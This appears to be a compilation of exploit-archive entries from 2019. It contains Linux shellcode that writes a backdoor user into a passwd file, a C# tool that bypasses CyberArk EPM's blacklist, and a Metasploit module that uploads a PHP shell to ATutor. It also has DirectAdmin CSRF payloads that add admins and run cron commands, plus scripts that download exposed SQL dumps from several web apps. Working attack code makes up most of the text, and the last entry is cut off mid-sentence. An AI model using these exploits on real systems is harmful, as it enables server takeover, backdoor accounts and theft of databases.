# Exploit Title: Linux/x86 add user to passwd file shellcode (149 bytes)
# Google Dork: None
# Date: 11.04.2019
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 149
------------------------------[Description]---------------------------------

This shellcode writes a new user to the given passwd file

Username = sshd
password = root
Shell = sh

-----------------------------[Shellcode Dump]---------------------------------
section .text

global _start

_start:
  xor eax, eax
  push eax

_user:
  push 0x0a206873
  push 0x2f6e6962
  push 0x2f3a706d
  push 0x742f3a31
  push 0x3131313a
  push 0x31313131
  push 0x3a30754a
  push 0x4c5a304b
  push 0x45683933
  push 0x78534a52
  push 0x50446862
  push 0x73644d24
  push 0x67513231
  push 0x3458652e
  push 0x2431243a
  push 0x64687373
  mov ebp, esp
  jmp short _file

_appendfile:
  pop ecx
  mov ebx, ecx
  xor ecx, ecx
  mov al, 5
  push ebx
  mov cx, 2001Q
  mov dx, 0x1A4
  int 0x80

_write:
  xor eax, eax
  xor ebx, ebx
  push eax
  mov al, 4
  add ebx, 3
  mov ecx, ebp
  xor edx, edx
  add edx, 64
  int 0x80

_close:
  xor eax, eax
  mov al, 6
  int 0x80

_exit:
  xor eax, eax,
  mov al, 1
  xor ebx, ebx
  int 0x80

_file:
  call _appendfile
  msg2 db "passwd", 0x00 ;change that yo your passwd file

 -----------------------------[Compile]---------------------------------------------
 gcc -m32 -fno-stack-protector -z execstack -o tester tester.c

 -----------------------------[C-Code]-----------------------------

 #include <stdio.h>
 #include <string.h>

 unsigned char shellcode[] = "\x31\xc0\x50\x68\x73\x68\x20\x0a\x68\x62\x69\x6e\x2f\x68\x6d\x70\x3a\x2f\x68\x31\x3a\x2f\x74\x68\x3a\x31\x31\x31\x68\x31\x31\x31\x31\x68\x4a\x75\x30\x3a\x68\x4b\x30\x5a\x4c\x68\x33\x39\x68\x45\x68\x52\x4a\x53\x78\x68\x62\x68\x44\x50\x68\x24\x4d\x64\x73\x68\x31\x32\x51\x67\x68\x2e\x65\x58\x34\x68\x3a\x24\x31\x24\x68\x73\x73\x68\x64\x89\xe5\xeb\x33\x59\x89\xcb\x31\xc9\xb0\x05\x53\x66\xb9\x01\x04\x66\xba\xa4\x01\xcd\x80\x31\xc0\x31\xdb\x50\xb0\x04\x83\xc3\x03\x89\xe9\x31\xd2\x83\xc2\x40\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xc8\xff\xff\xff\x70\x61\x73\x73\x77\x64";
 void main()
 {
     printf("Shellcode Length:  %d\n", strlen(shellcode));

     int (*ret)() = (int(*)())shellcode;
     ret();
 }

# Exploit Title: CyberArk Endpoint bypass 
# Google Dork: -
# Date: 03/06/2018
# Exploit Author: Alpcan Onaran
# Vendor Homepage: https://www.cyberark.com
# Software Link: -
# Version: 10.2.1.603
# Tested on: Windows 10
# CVE : CVE-2018-14894

//If user needs admin privileges, CyberArk gives the admin token to user for spesific process not for the whole system. It is cool idea.
//This product also has a function called “Application Blacklist”. You probably know what that means.
//It helps you to block to execute specified application by CyberArk admin. In normal cases, you can not be able to start this process even with admin rights.
//But We found very interesting trick to make CyberArk blind completely.All you need to do, revoke read privileges for system on the file that you want to open it.
//After you do that, CyberArk EPM can not be able to get information about your blocked file and it just let them execute

This exploit works on CyberArk EPM 10.2.1.603 and below. (Tested on Windows 10 x64)
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System;
using System.IO;
using System.Security.AccessControl;

namespace raceagainstthesystem
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void btn_change_access_control_Click(object sender, EventArgs e)
        {
            string fileName = txt_filepath.Text;
            FileSecurity fSecurity = File.GetAccessControl(fileName);
            fSecurity.AddAccessRule(new FileSystemAccessRule(@"SYSTEM",
                    FileSystemRights.ReadData, AccessControlType.Deny));
            File.SetAccessControl(fileName, fSecurity);

            /*
            fSecurity.RemoveAccessRule(new FileSystemAccessRule(@"SYSTEM",
                    FileSystemRights.ReadData, AccessControlType.Allow));
            */

            File.SetAccessControl(fileName, fSecurity);
        }

        private void btn_choseFile_Click(object sender, System.EventArgs e)
        {
            OpenFileDialog choofdlog = new OpenFileDialog();
            choofdlog.Filter = "All Files (*.*)|*.*";
            choofdlog.FilterIndex = 1;
            choofdlog.Multiselect = true;

            string sFileName = "";

            if (choofdlog.ShowDialog() == DialogResult.OK)
            {
                sFileName = choofdlog.FileName;
                string[] arrAllFiles = choofdlog.FileNames; //used when Multiselect = true           
            }
            txt_filepath.Text = sFileName;
        }
    }
}

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
'Name'           => "ATutor < 2.2.4 'file_manager' Remote Code Execution",
'Description'    => %q{
         This module allows the user to run commands on the server with teacher user privilege.
         The 'Upload files' section in the 'File Manager' field contains arbitrary file upload vulnerability.
         The "$IllegalExtensions" function has control weakness and shortcomings.
         It is possible to see illegal extensions within "constants.inc.php". (exe|asp|php|php3|php5|cgi|bat...)
         However, there is no case-sensitive control. Therefore, it is possible to bypass control with filenames such as ".phP", ".Php"
         It can also be used in dangerous extensions such as "shtml" and "phtml". 
         The directory path for the "content" folder is located at "config.inc.php".
         For the exploit to work, the "define ('AT_CONTENT_DIR', 'address')" content folder must be located in the web home directory or the address must be known.

         This exploit creates a course with the teacher user and loads the malicious php file into server.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & MSF Module
        ],
'References'     =>
        [
          [ 'CVE', ''  ],
          [ 'URL', 'http://pentest.com.tr/exploits/ATutor-2-2-4-file-manager-Remote-Code-Execution-Injection-Metasploit.html' ],
          [ 'URL', 'https://atutor.github.io/' ],
          [ 'URL', 'http://www.atutor.ca/' ]
        ],
'Privileged'     => false,
'Payload'        =>
        {
'DisableNops' => true,
        },
'Platform'       => ['php'],
'Arch'           => ARCH_PHP,
'Targets'        => [[ 'Automatic', { }]],
'DisclosureDate' => '09 April 2019',
'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
        OptString.new('USERNAME', [true, 'The Teacher Username to authenticate as']),
        OptString.new('PASSWORD', [true, 'The Teacher password to authenticate with']),
        OptString.new('CONTENT_DIR', [true, 'The content folder location', 'content'])
      ],self.class)
  end

  def exec_payload

    send_request_cgi({
'method'   => 'GET',
'uri'      => normalize_uri(target_uri.path, "#{datastore['CONTENT_DIR']}", @course_id, "#{@fn}")
    })
  end

  def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end

  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  def print_error(msg='')
    super("#{peer} - #{msg}")
  end

  def print_good(msg='')
    super("#{peer} - #{msg}")
  end
##
# Version and Vulnerability Check
##
  def check

    res = send_request_cgi({
'method'   => 'GET',
'uri'      => normalize_uri(target_uri.path, "#{datastore['CONTENT_DIR']}/")
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 404
       return Exploit::CheckCode::Safe
    end
    return Exploit::CheckCode::Appears
  end
##
# csrftoken read and create a new course
##
  def create_course(cookie, check)

    res = send_request_cgi({
'method'   => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "_core", "courses", "users", "create_course.php"),
'headers' =>
      {
'Referer' => "#{peer}#{datastore['TARGETURI']}users/index.php",
'cookie'   => cookie,
      },
'agent' => 'Mozilla'
    })

    if res && res.code == 200 && res.body =~ /Create Course: My Start Pag/
      @token = res.body.split('csrftoken"  value="')[1].split('"')[0]
    else
      return false
    end 

    @course_name = Rex::Text.rand_text_alpha_lower(5)
    post_data = Rex::MIME::Message.new
    post_data.add_part(@token, nil, nil,'form-data; name="csrftoken"')
    post_data.add_part('true', nil, nil, 'form-data; name="form_course"')
    post_data.add_part(@course_name, nil, nil, 'form-data; name="title"')
    post_data.add_part('top', nil, nil, 'form-data; name="content_packaging"')
    post_data.add_part('protected', nil, nil, 'form-data; name="access"')
    post_data.add_part('Save', nil, nil, 'form-data; name="submit"')
    data = post_data.to_s

    res = send_request_cgi({
'method' => 'POST',    
'data'  => data,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => cookie,
'uri' => normalize_uri(target_uri.path, "mods", "_core", "courses", "users", "create_course.php")     
    })

    location = res.redirection.to_s
    if res && res.code == 302 && location.include?('bounce.php?course')
      @course_id = location.split('course=')[1].split("&p")[0]
      return true
    else
      return false
    end
  end
##
# Upload malicious file // payload integration
##
  def upload_shell(cookie, check)

    res = send_request_cgi({
'method'   => 'GET',
'uri' => normalize_uri(target_uri.path, "bounce.php?course=" + @course_id),
'headers' =>
      {
'Referer' => "#{peer}#{datastore['TARGETURI']}users/index.php",
'cookie'   => cookie,
      },
'agent' => 'Mozilla'
    })

    ucookie = "ATutorID=#{$2};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*);/

    file_name = Rex::Text.rand_text_alpha_lower(8) + ".phP"
    @fn = "#{file_name}"
    post_data = Rex::MIME::Message.new
    post_data.add_part('10485760', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
    post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"uploadedfile\"; filename=\"#{file_name}\"")
    post_data.add_part('Upload', nil, nil, 'form-data; name="submit"')
    post_data.add_part('', nil, nil, 'form-data; name="pathext"')

    data = post_data.to_s

    res = send_request_cgi({
'method' => 'POST',    
'data'  => data,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => ucookie,
'uri' => normalize_uri(target_uri.path, "mods", "_core", "file_manager", "upload.php")     
    })

    if res && res.code == 302 && res.redirection.to_s.include?('index.php?pathext')
      print_status("Trying to upload #{file_name}")
      return true
    else
      print_status("Error occurred during uploading!")
      return false
    end
  end
##
# Password encryption with csrftoken
##
  def get_hashed_password(token, password, check)
    if check
      return Rex::Text.sha1(password + token)
    else
      return Rex::Text.sha1(Rex::Text.sha1(password) + token)
    end
  end
##
# User login operations
##
  def login(username, password, check)
    res = send_request_cgi({
'method'   => 'GET',
'uri'      => normalize_uri(target_uri.path, "login.php"),
'agent' => 'Mozilla',
    })

    token = $1 if res.body =~ /\) \+ \"(.*)\"\);/
    cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/
    if check
      password = get_hashed_password(token, password, true)
    else
      password = get_hashed_password(token, password, false)
    end

    res = send_request_cgi({
'method'   => 'POST',
'uri'      => normalize_uri(target_uri.path, "login.php"),
'vars_post' => {
'form_password_hidden' => password,
'form_login' => username,
'submit' => 'Login'
      },
'cookie' => cookie,
'agent' => 'Mozilla'
    })
    cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/

    if res && res.code == 302
       if res.redirection.to_s.include?('bounce.php?course=0')
        res = send_request_cgi({
'method'   => 'GET',
'uri'      => normalize_uri(target_uri.path, res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla'
        })
        cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
        if res && res.code == 302 && res.redirection.to_s.include?('users/index.php')
           res = send_request_cgi({
'method'   => 'GET',
'uri'      => normalize_uri(target_uri.path, res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla'
           })
           cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
           return cookie
          end
       else res.redirection.to_s.include?('admin/index.php')
          fail_with(Failure::NoAccess, 'The account is the administrator. Please use a teacher account!')
          return cookie
       end
    end

    fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
    return nil
  end
##
# Exploit controls and information
##
  def exploit
    tcookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
    print_good("Logged in as #{datastore['USERNAME']}")

    if create_course(tcookie, true)
      print_status("CSRF Token : " + @token)
      print_status("Course Name : " + @course_name + " Course ID : " + @course_id)
      print_good("New course successfully created.")
    end

    if upload_shell(tcookie, true)
      print_good("Upload successfully.")
      print_status("Trying to exec payload...")
      exec_payload
    end
  end
end
##
# The end of the adventure (o_O) // AkkuS
##

# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <= 
v1.561
# Date: 12.04.2019
# Author: Numan OZDEMIR
# Vendor Homepage: https://www.directadmin.com/
# Version: Up to v1.561.
# CVE: CVE-2019-11193
# info@infinitumit.com.tr && root@numanozdemir.com
# Detailed: https://numanozdemir.com/respdisc/directadmin.pdf

# Description:
# Multiple security vulnerabilities has been discovered in popular 
server control panel DirectAdmin, by
# InfinitumIT. Attackers can combine those security vulnerabilities and 
do a lot of critical action like server control takeover.
# Those vulnerabilities (Cross Site Scripting and Cross Site Request 
Forgery) may cause them to happen:
# Add administrator, execute command remote (RCE), Full Backup the 
Server and Upload the Own Server, webshell upload and more.

# Reflected XSS Vulnerabilities:
# https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD
# https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD
# https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD

# Example Payloads:
# Add Administrator:
var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN";
var params =
"fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&emai
l=test%40test.com&passwd=password&passwd2=password&notify=ye";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);

# Remote Command Execution by Cron Jobs:
var url = "http://SERVERIP:2222/CMD_CRON_JOBS";
var params =
"action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);

# Edit File:
var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR";
var params = "file=the-file-full-path&action=save&text=new-content";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);

# Create FTP Account:
var url = "http://SERVERIP:2222/CMD_FTP";
var params =
"fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr
&user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&cu
stom_val=%2Fhome%2Fusername&create=Create";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);


# Vulnerabilities are fixed in minutes, thanks to DirectAdmin.
# InfinitumIT / For safer days...

###########################################################################

# Exploit Title : Gibbonedu The Flexible School Platform 17.0.00 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/04/2019
# Vendor Homepage : gibbonedu.org
# Software Download Link : gibbonedu.org/download/
github.com/GibbonEdu/core/archive/master.zip
github.com/GibbonEdu/core/archive/v17.0.00.zip
# Software Information Link : gibbonedu.org/features/
docs.gibbonedu.org/administrators/getting-started/installing-gibbon/
docs.gibbonedu.org
github.com/GibbonEdu/core
# Software Version : 17.0.00
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

###########################################################################

# Information about Software :
****************************
Created by teachers, Gibbon is the school platform which solves real problems encountered 

by educators every day.

Being free, open source and flexible Gibbon can morph to meet the needs of

 a huge range of schools.

Gibbon is a flexible, open source school management platform designed to make 

life better for teachers, students, parents and leaders.

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information 

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of 

MySQL over the World Wide Web. It can be used to dump a database or a collection of 

databases for backup or transfer to another SQL server (not necessarily a MySQL server). 

The dump typically contains SQL statements to create the table, populate it, or both. 

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and 

should not be found on a production system.

* It looks like this file contains a database backup/dump. 

Acunetix inferred this filename from the domain name. A database backup contains a record of the

 table structure and/or the data from a database and is usually in the form of a list of SQL statements. 

A database backup is most often used for backing up a database so that its contents can be restored 

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible 

to the web server. As a workaround, you could restrict access to this file.

INSTALLING GIBBON
***********************
Server Requirements
********************
Apache 2
PHP 7.0 or above (with PDO, gettext, CURL. Recommended to turn display_errors off.)
MySQL 5 (collation set to utf8_general_ci)

Manual Installation :
*******************
After download and unzipping:
Copy all files to your server, choosing either the root directory or a sub-folder within it.
Navigate your browser to the folder on your server where Gibbon has been located.
Follow the on-screen instructions in Gibbon’s new installer.
Check out the Getting Started With Gibbon page for more information.
Note: If you want to help test and develop Gibbon, you can select the Cutting Edge 
Code option in the installer. This allows you to run the latest code from our GitHub repo. 
This is not recommended for production environments.

Post-Install & Server Config
**************************
Set permissions of all Gibbon files so they are not publicly writeable (e.g. chmod -Rv 755).
Create folder /uploads and set file permissions for to allow writing by web server 
(avoid chmod 777 for security reasons).
To improve security and reliability, magic_quotes_gpc should be turned off in php.ini. 
This is supposed to be deprecated in PHP 5.3, but experience shows sometimes 
it is better to turn it off anyway.
Turn PHP register_globals off. On shared host, use .htaccess php_flag register_globals off to do this
Set PHP to allow <? as well as <?php. Turn short_open_tag on. (This is not required for
 running the Core as of v8.0.00 or greater. Update your additional modules to the latest version.)
Turn folder browsing off. On shared host, use .htaccess Options -Indexes
Set PHP’s max_file_uploads to at least the number of students in a class.
Set PHP’s error to be error_reporting = E_ALL & ~E_NOTICE or less aggressive
Set PHP to allow URLs as files (otherwise Calendar overlay in TT will not work). allow_url_fopen=On
Set PHP’s max_input_vars setting to 5,000 (otherwise Manage Permissions breaks)
On systems that use selinux make sure to run setsebool -P 
httpd_can_sendmail 1 to enable Gibbon to send mail.

###########################################################################

File :
******
/gibbon.sql

Information :
*************
-- phpMyAdmin SQL Dump
-- version 4.7.7
-- phpmyadmin.net
--
-- Host: localhost:3306
-- Server version: 5.6.38
-- PHP Version: 7.2.1
-- Database: `gibbon`

raw.githubusercontent.com/GibbonEdu/core/master/gibbon.sql

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/gibbon.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('Gibbonedu The Flexible School Platform 17.0.00 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="gibbon.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/gibbon.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/gibbon.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###########################################################################

###########################################################################

# Exploit Title : JobSkee Open Source JobBoard 1.1.3 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/04/2019
# Vendor Homepage : jobskee.com
# Software Download Link : jobskee.com/download.php
# Software Information Link : jobskee.com/setup-your-own-job-board-in-10-steps.php
github.com/elinoretenorio/jobskee-open-source-job-board
# Software Version : 1.1.3
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

###########################################################################

# Information about Software :
****************************
Jobskee is a simple open source job board for everyone.

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information 

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of 

MySQL over the World Wide Web. It can be used to dump a database or a collection of 

databases for backup or transfer to another SQL server (not necessarily a MySQL server). 

The dump typically contains SQL statements to create the table, populate it, or both. 

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and 

should not be found on a production system.

* It looks like this file contains a database backup/dump. 

Acunetix inferred this filename from the domain name. A database backup contains a record of the

 table structure and/or the data from a database and is usually in the form of a list of SQL statements. 

A database backup is most often used for backing up a database so that its contents can be restored 

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible 

to the web server. As a workaround, you could restrict access to this file.

Stacks used :
***************
Slim Microframework
RedBeanPHP
Bootstrap 3 UI
PHPMailer
Markdown
etc.

Requirements :
*****************
PHP 5.3 and above
MySQL
mod_rewrite enabled
Installation
Export sql file
Update admin table with your desired username and password (sha1)
Upload the files
Update config.php with your settings
Change file permission of /assets/images and /assets/attachments to 777
Check that all .htaccess files were uploaded
Default admin login info: Email: admin@example.com Password: admin

Installation Notes : 
*****************
Enable PHP5.3+ using .htaccess
Some old hosting providers still use PHP5.2 version, note that 
Jobskee will not run on this old version.

In order to use PHP5.3+, you can edit .htaccess file in the root folder 
and uncomment (remove the pound sign at the beginning of) this line:

?AddType application/x-httpd-php53 .php

Importing jobskee.sql
When you download Jobskee, you will find a database file 
included that you need to import to a MySQL database.

Before importing however, you can edit the file to update several things:

ADMIN ACCOUNT

You can look for this line in the .sql file

?INSERT INTO admin (id, email, password) VALUES 
(1, 'admin@example.com', 'd033e22ae348aeb5660fc2140aec35850c4da997');

?and change it with the values you want:

?INSERT INTO admin (id, email, password) VALUES 
(1, 'your desired admin email address', sha1('your desired admin password'));

You can also customize the default values for Categories and Cities 
with the values you want before importing jobskee.sql to your own database.

Setting up your Jobskee job board
After downloading Jobskee? and have setup your database and correct folder 
permission on assets/attachments and assets/images, you can now setup your 
job board by opening the config.php file found in the root folder.

I'd like to mention some important values in the config.php that you need to 
set in order to successfully run your job board:

APP_MODE - currently defaulted to 'development'. You need to set this to 
'production' when your site is in production mode as it affects several 
other configuration (i.e. database, debug, etc.)

APP_THEME - currently set to 'default'. This is the default theme used by Jobskee. 
If you would like to customize this theme, it is recommended that you copy 
/views/default to your new theme (i.e. /views/my_theme) and set APP_THEME to
'my_theme'. This will ensure that you can go back to the default theme, 
should your theme customization produce error that you cannot recover.

SMTP SETTINGS - the default SMTP settings is Gmail friendly and should
 work right away when you provide your correct Gmail information. 
For other settings, like using your own hosting's default mail host, 
you must configure it correctly in order for email notifications to work.

These are the recommended settings:

Using "localhost"

?// SMTP SETTINGS
define('SMTP_ENABLED', true);
define('SMTP_AUTH', false);
define('SMTP_URL', 'localhost');
define('SMTP_USER', 'email@example.com');
define('SMTP_PASS', '');
define('SMTP_PORT', 25);
define('SMTP_SECURE', '');

and using Gmail

// SMTP SETTINGS
define('SMTP_ENABLED', true);
define('SMTP_AUTH', true);
define('SMTP_URL', 'smtp.gmail.com');
define('SMTP_USER', 'email@gmail.com');
define('SMTP_PASS', 'gmail password);
define('SMTP_PORT', 465);
define('SMTP_SECURE', 'ssl');

APPLICATION URL PATHS - as commented in the file, 
you need to provide your full URL including the trailing slashes.

SHARETHIS_PUBID - in order to enable the social media 
sharing for the jobs, you need to register a Publication ID at www.sharethis.com

CRON_TOKEN - this is used for running cron job to expire jobs. 
Provide a unique token that you can use in order to 
expire jobs using the path: /cron/jobs/expire/:cron_token

GA_TRACKING - get insights to your job board by adding 
a Google Analytics tracking ID here.

###########################################################################

File :
******
/jobskee.sql

Information :
*************
-- phpMyAdmin SQL Dump
-- version 4.0.5
-- http://www.phpmyadmin.net
--
-- Host: 127.0.0.1:3306
-- Generation Time: Aug 30, 2015 at 09:50 PM
-- Server version: 5.5.27
-- PHP Version: 5.5.7
-- Database: `jobskee`

-- Table structure for table `admin`

-- Dumping data for table `admin`

-- INSERT INTO `admin` (`id`, `email`, `password`) VALUES
(1, 'admin@example.com', 'd033e22ae348aeb5660fc2140aec35850c4da997');

-- Table structure for table `applications`

-- Table structure for table `banlist`

-- Table structure for table `blocks`

-- Dumping data for table `blocks`

-- Table structure for table `categories`

-- Dumping data for table `categories`

-- Table structure for table `cities`

-- Dumping data for table `cities`

-- Table structure for table `downloads`

-- Table structure for table `jobs`

-- Table structure for table `pages`

-- Dumping data for table `pages`

-- Table structure for table `subscriptions`

raw.githubusercontent.com/elinoretenorio/jobskee-open-source-job-board/master/jobskee.sql

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/jobskee.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('JobSkee Open Source JobBoard 1.1.3 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="jobskee.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/jobskee.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/jobskee.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###########################################################################

###########################################################################

# Exploit Title : Opus Online Placement University System 4.2.0 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/04/2019
# Vendor Homepage : foss.ulster.ac.uk
# Software Download Link : foss.ulster.ac.uk/redmine/projects/opus/files
github.com/profcturner/opus/archive/master.zip
foss.ulster.ac.uk/redmine/attachments/download/1/opus_4.2.0.orig.tar.gz
# Software Information Link : foss.ulster.ac.uk/redmine/projects/opus
github.com/profcturner/opus
# Software Version : 4.2.0 and lower versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

###########################################################################

# Information about Software :
****************************
OPUS: Online Placement University System, for online management of work based learning.

Developed By Ulster University from England - [ Great Britain ]

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information 

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of 

MySQL over the World Wide Web. It can be used to dump a database or a collection of 

databases for backup or transfer to another SQL server (not necessarily a MySQL server). 

The dump typically contains SQL statements to create the table, populate it, or both. 

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and 

should not be found on a production system.

* It looks like this file contains a database backup/dump. 

Acunetix inferred this filename from the domain name. A database backup contains a record of the

 table structure and/or the data from a database and is usually in the form of a list of SQL statements. 

A database backup is most often used for backing up a database so that its contents can be restored 

